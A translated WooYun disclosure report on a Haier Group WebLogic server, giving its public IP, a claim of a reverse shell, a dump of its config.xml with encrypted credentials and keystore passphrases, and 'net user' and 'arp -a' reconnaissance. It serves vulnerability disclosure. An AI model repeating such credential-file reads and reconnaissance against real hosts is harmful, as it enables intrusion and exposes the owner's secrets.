Vulnerability summary

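Bug ID: wooyun-2015-0163712

Vulnerability title: A Haier Group system is affected by the WebLogic deserialization vulnerability (allows access to the internal network)

Vendor: Haier Group

Reported by: 路人甲

Submitted: 2015-12-22 23:13

Fixed: 2016-02-06 10:45

Publicly disclosed: 2016-02-06 10:45

Vulnerability type: Command execution

Severity: High

Self-assessed rank: 20

Vulnerability status: Confirmed by vendor

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]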



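Vulnerability details

Disclosure status:

2015-12-22: Details reported to the vendor; awaiting vendor action
2015-12-24: Vendor confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in related fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public

Brief description:

Haier Group

Detailed description:

http://27.223.70.77:7001/
is affected by the WebLogic deserialization vulnerability.
A reverse shell can be obtained.

1.jpg


Reading the configuration information: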
D:\Oracle\Middleware\user_projects\domains\base_domain\config>type config.xml

type config.xml
<?xml version='1.0' encoding='UTF-8'?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
<name>base_domain</name>
<domain-version>10.3.5.0</domain-version>
<security-configuration>
<name>base_domain</name>
<realm>
<sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider>
<sec:authentication-provider xsi:type="wls:default-identity-asserterType">
<sec:active-type>AuthenticatedUser</sec:active-type>
</sec:authentication-provider>
<sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper>
<sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer>
<sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator>
<sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper>
<sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider>
<sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
<sec:name>myrealm</sec:name>
<sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
<sec:name>SystemPasswordValidator</sec:name>
<pas:min-password-length>8</pas:min-password-length>
<pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
</sec:password-validator>
</realm>
<default-realm>myrealm</default-realm>
<credential-encrypted>{AES}k77cNkchopQnD98Lk9bhatCSc8LYsOIPwQpBwD2IZ4GGFFkV2NWnNMNAG69CBoBpLK7gQa+WCOek6AfWNz6etTFe8A42os5QZQhevUwJVTqYBPcbP9JGDSjzq9+YOLOd</credential-encrypted>
<node-manager-username>kXRx0qV8Ci</node-manager-username>
<node-manager-password-encrypted>{AES}rBvG0C6Lqyj+i1tVEsjg1uRLlZA0FxVOBNPPT0mzHbI=</node-manager-password-encrypted>
</security-configuration>
<server>
<name>AdminServer</name>
<ssl>
<server-private-key-alias>weblogic</server-private-key-alias>
<server-private-key-pass-phrase-encrypted>{AES}gI07Nk70oXtmsbc9eRoE1GEiFoeioTtTZzTdfamsiy0=</server-private-key-pass-phrase-encrypted>
</ssl>
<listen-address></listen-address>
<key-stores>DemoIdentityAndDemoTrust</key-stores>
<custom-identity-key-store-file-name>D:\Oracle\MIDDLE~1\WLSERV~1.3\server\lib\DemoIdentity.jks</custom-identity-key-store-file-name>
<custom-identity-key-store-type>jks</custom-identity-key-store-type>
<custom-identity-key-store-pass-phrase-encrypted>{AES}WJ4ttnQJEBtkpWAkO+MUDJmreWP0GIxLLoP1htB22kI=</custom-identity-key-store-pass-phrase-encrypted>
<custom-trust-key-store-file-name>D:\Oracle\Middleware\user_projects\domains\base_domain\jpushJks1.jks</custom-trust-key-store-file-name>
<custom-trust-key-store-type>jks</custom-trust-key-store-type>
<custom-trust-key-store-pass-phrase-encrypted>{AES}wd3BUY+mB9X7NC4wCcfmI6mFnkRgtbCq0vCYTL3heLA=</custom-trust-key-store-pass-phrase-encrypted>
</server>
<production-mode-enabled>true</production-mode-enabled>
<embedded-ldap>
<name>base_domain</name>
<credential-encrypted>{AES}pbAo/PlhkYvUI6OQFrA89rodZK09WpCs+EeP04TAVbg0xr0eDQ8xqy0+RfmIwu/5</credential-encrypted>
</embedded-ldap>
<configuration-version>10.3.5.0</configuration-version>
<app-deployment>
<name>sales</name>
<target>AdminServer</target>
<module-type>war</module-type>
<source-path>servers\AdminServer\upload\sales.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
</app-deployment>
<app-deployment>
<name>dkt</name>
<target>AdminServer</target>
<module-type>war</module-type>
<source-path>servers\AdminServer\upload\dkt.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
</app-deployment>
<admin-server-name>AdminServer</admin-server-name>
</domain>


net user

2.jpg


arp -a

3.jpg




Proof of vulnerability:

net user

2.jpg


arp -a

3.jpg

Remediation:

Upgrade

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


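Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-12-24 09:07

Vendor reply:

Thank you to the white hat for the testing and the reminder; we have assigned staff to handle it.

Latest status:

None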

